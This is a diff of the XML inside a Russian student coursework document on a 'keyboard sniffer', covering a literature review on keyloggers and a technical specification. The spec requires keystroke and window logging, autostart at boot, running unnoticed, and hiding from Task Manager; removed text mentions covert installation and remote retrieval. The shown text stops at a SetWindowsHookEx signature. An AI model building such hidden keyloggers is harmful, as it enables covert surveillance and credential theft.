     </w:p>
     <w:p>
       <w:pPr>
@@ -2417,7 +2486,8 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:left="-180" w:firstLine="720"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -2429,12 +2499,14 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Требуется разработать программу, ведущую мониторинг нажатий клавиш на клавиатуре.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="-180" w:firstLine="720"/>
+        <w:tab/>
+        <w:t>1.1 Общие сведения.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -2446,12 +2518,43 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Необходимо предусмотреть возможности:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="180" w:firstLine="720"/>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Название: «</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Сниффер</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> клавиатуры</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">». </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -2463,20 +2566,69 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
+        <w:t>«</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Сниффер</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> клавиатуры</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">» − программа для </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>слежения за активностью пользователя</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:tab/>
-        <w:t>отслеживание нажатий клавиш</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="1410" w:hanging="510"/>
+        <w:t>1.2 Назначения и цели программного средства.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -2484,9 +2636,10 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t>- </w:t>
-      </w:r>
-      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:tab/>
       </w:r>
       <w:r>
@@ -2494,12 +2647,27 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>запись вводимой информации в файл</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="180" w:firstLine="720"/>
+        <w:t>Назначения: программа предназначена для</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> отслеживания нажатия клавиш на клавиатуре, а также отслеживания изменения активного окна</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -2511,20 +2679,21 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
         <w:tab/>
-        <w:t>дистанционно получать информацию о работе программы</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="180" w:firstLine="720"/>
+        <w:t xml:space="preserve">Цели: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>повышение производительности сотрудников на работе, при помощи контроля их активности. Родительский контроль.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -2536,20 +2705,14 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
         <w:tab/>
-        <w:t>возможность незаметной работы для пользователя</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="180" w:firstLine="720"/>
+        <w:t>1.3 Требования к программному средству</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
@@ -2561,83 +2724,49 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
         <w:tab/>
-        <w:t>возможность незаметной установки</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="180" w:firstLine="720"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Используемые</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> язык</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>и</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> программирования – </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>С, С++</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Данная программа должна </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">вести мониторинг клавиатуры, отслеживать активные окна, активные вкладки в браузерах. Программа автоматически </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>запускается</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> пр</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>и загрузке компьютера и работает</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> незаметно для пользователя. Программа не должна отображаться в Диспетчере задач. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a4"/>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3351,7 +3480,7 @@
     <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
     <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
     <w:lsdException w:name="Revision" w:semiHidden="1"/>
-    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
+    <w:lsdException w:name="List Paragraph" w:qFormat="1"/>
     <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
     <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
     <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
@@ -3816,7 +3945,7 @@
   <w:style w:type="paragraph" w:styleId="ae">
     <w:name w:val="List Paragraph"/>
     <w:basedOn w:val="a"/>
-    <w:uiPriority w:val="34"/>
+    <w:uiPriority w:val="99"/>
     <w:qFormat/>
     <w:rsid w:val="00532646"/>
     <w:pPr>
@@ -4119,7 +4248,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{36DBC590-AC1B-4324-83E8-907116227972}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{CCEA1A86-C883-4E13-867B-0C09B54478D2}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Курсовая_Работа_Клавиатурный_Сниффер .docx
+++ b/Курсовая_Работа_Клавиатурный_Сниффер .docx
@@ -1151,17 +1151,15 @@
         <w:pStyle w:val="1"/>
         <w:jc w:val="center"/>
         <w:rPr>
-          <w:b w:val="0"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="0" w:name="_Toc414805627"/>
       <w:r>
         <w:rPr>
-          <w:b w:val="0"/>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="32"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>Введение</w:t>
       </w:r>
@@ -1347,22 +1345,27 @@
     <w:p/>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="1"/>
+        <w:pStyle w:val="ae"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
         <w:jc w:val="center"/>
         <w:rPr>
-          <w:b w:val="0"/>
-          <w:sz w:val="36"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc414805628"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:sz w:val="36"/>
-        </w:rPr>
-        <w:t>1.Обзор литературы</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="1"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Обзор литературы</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1425,8 +1428,11 @@
         <w:t>».</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ae"/>
@@ -1435,6 +1441,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -1456,23 +1463,12 @@
         <w:t>снифферов</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ae"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="2"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -1527,6 +1523,7 @@
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -1603,6 +1600,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -1646,6 +1644,7 @@
           <w:numId w:val="3"/>
         </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -1712,6 +1711,7 @@
           <w:numId w:val="3"/>
         </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -1819,6 +1819,7 @@
           <w:numId w:val="3"/>
         </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -1859,18 +1860,18 @@
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="360"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>Кейлоггеры</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -1886,6 +1887,7 @@
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -1896,6 +1898,7 @@
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -1913,17 +1916,25 @@
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="360"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Пожалуй, это самый распространен</w:t>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Э</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>то самый распространен</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2006,6 +2017,7 @@
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -2023,6 +2035,7 @@
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -2041,6 +2054,7 @@
         <w:pStyle w:val="af"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -2105,6 +2119,7 @@
         <w:pStyle w:val="af"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -2129,15 +2144,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">недостатки — отсутствие гарантии </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>обнаружения всех нажатий, могут быть пропуски; легко обнаруживается мониторингом процессов, опрашивающих клавиатуру с высокой частотой.</w:t>
+        <w:t>недостатки — отсутствие гарантии обнаружения всех нажатий, могут быть пропуски; легко обнаруживается мониторингом процессов, опрашивающих клавиатуру с высокой частотой.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2145,6 +2152,7 @@
         <w:pStyle w:val="af"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -2156,6 +2164,7 @@
         <w:pStyle w:val="af"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -2167,6 +2176,7 @@
         <w:pStyle w:val="af"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -2194,6 +2204,7 @@
         <w:pStyle w:val="af"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -2295,6 +2306,7 @@
         <w:pStyle w:val="af"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -2327,6 +2339,7 @@
         <w:pStyle w:val="af"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
@@ -2468,21 +2481,28 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a4"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc414805629"/>
-      <w:r>
-        <w:t xml:space="preserve">2. </w:t>
-      </w:r>
-      <w:r>
+        <w:pStyle w:val="ae"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Техническое задание</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="3"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2771,15 +2791,5157 @@
     <w:p>
       <w:pPr>
         <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="4" w:name="_Toc414805630"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ae"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Системное проектирование</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ae"/>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="7545"/>
+        </w:tabs>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ae"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Функциональное </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>проектирование</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="1"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Данный раздел включает в себя описание основных методов программы и их листинги.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>HHOOK</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>SetWindowsHookEx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>idHook</w:t>
+      </w:r>
